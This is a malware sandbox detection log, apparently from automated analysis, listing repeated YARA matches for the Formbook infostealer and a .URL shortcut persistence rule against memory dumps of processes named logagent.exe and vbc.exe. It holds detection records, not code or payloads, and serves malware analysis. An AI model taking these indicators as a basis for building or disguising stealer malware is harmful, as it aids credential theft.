Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498505335.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498480365.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565073378.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565679840.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498627216.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588564983.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588126227.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498862779.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588811679.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498678238.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498733473.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498702228.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566149960.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499081550.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588856933.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565115877.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499010523.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565865181.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565257536.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498814770.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589154699.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.498598880.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565980818.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566198951.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.589598221.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.498651349.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565719337.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499260635.0000000004204000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589004942.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.588625947.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588510605.0000000004724000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.566332396.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.499284882.00000000039CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.590084354.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000008.00000003.565331288.000000000389C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000003.588264614.0000000003A4C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000003.565525257.00000000044C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000B.00000003.589996765.0000000004064000.00000004.00000010.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
